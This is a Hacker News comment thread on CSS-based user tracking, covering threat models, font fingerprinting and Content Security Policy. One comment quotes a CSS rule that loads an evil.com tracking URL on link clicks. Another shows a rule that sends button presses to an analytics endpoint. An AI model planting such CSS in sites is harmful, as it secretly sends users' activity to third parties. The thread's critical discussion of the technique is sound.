
Tracking Users with CSS (2018) - zinssmeister
https://www.templarbit.com/blog/2018/03/20/tracking-users-with-css/
======
saagarjha
This article seems to have a threat model where a website is “compromised”
into sending user data to a third party, but I don’t really see anything that
protects users from a website whose owner actively wants to track them. This
is an odd threat model to have.

Also, as an aside:

> For example, by detecting whether the browser supports the Calibri font
> family, we can assume that the browser is running in Windows

I’m pretty sure that Safari has stopped allowing the use of third party fonts
for exactly this reason, and now reports a standard set of fonts as being
available.

~~~
javajosh
You can't assume that only the origin will be serving css. Most pages these
days contain resources from all over the web, and most developers assume that
CSS is safe to load from anywhere. What's not clear to me is whether 'evil' in
_content: url(
"[https://evil.com/track?action=link_clicked"](https://evil.com/track?action=link_clicked")
_ can point to anywhere on the web? Or just the origin of the css? Or...?

~~~
IggleSniggle
Depends on the Content Security Policy of the site.

~~~
javajosh
Yes, of course - but what is the default if you don't have a CSP? I guess I
will have to do the experiment.

~~~
IggleSniggle
Apologies, wasn't trying to be snarky. If you are configured to allow
resources to load from anywhere, the CSS can load a resource from anywhere,
not just the location it originated from. These kinds of configurations are
increasingly less the default, however, so depending your specific setup, you
may find that some origin policies are in place by default. This is entirely
dependent on your chain, however, including browser settings.

------
Tepix
I like the idea of loading all linked content at page load time.

~~~
DaiPlusPlus
That’s bad for mobile - especially if a website has really large images for
high-DPI devices. I think you can configure some mobile browsers to always
download low-DPI assets to save on bandwidth.

~~~
Tepix
You could make it optional. Right now there's almost nothing you can do when
you visit a site even if you know it uses this technique.

------
jwilk
Previous discussion:

[https://news.ycombinator.com/item?id=16157773](https://news.ycombinator.com/item?id=16157773)

------
fawelo123
Afaik doesnt work on Firefox.

~~~
fawelo123
And if you are using anything but Firefox you shouldn't worry about your
browser history anyway. Due to fingerprintning you give all of your browsing
history to Google regardless.

------
interfixus
Css is fundamentally breaching the contract by messing in any way whatsoever
with content.

~~~
scegit
You can still do this

input[type="button"]:active { background-image: url('[http://www.google-
analytics.com/collect?v=1&_v=j23&a=...');](http://www.google-
analytics.com/collect?v=1&_v=j23&a=...'\);) }

[https://www.smashingmagazine.com/2014/10/css-only-
solution-f...](https://www.smashingmagazine.com/2014/10/css-only-solution-for-
ui-tracking/)

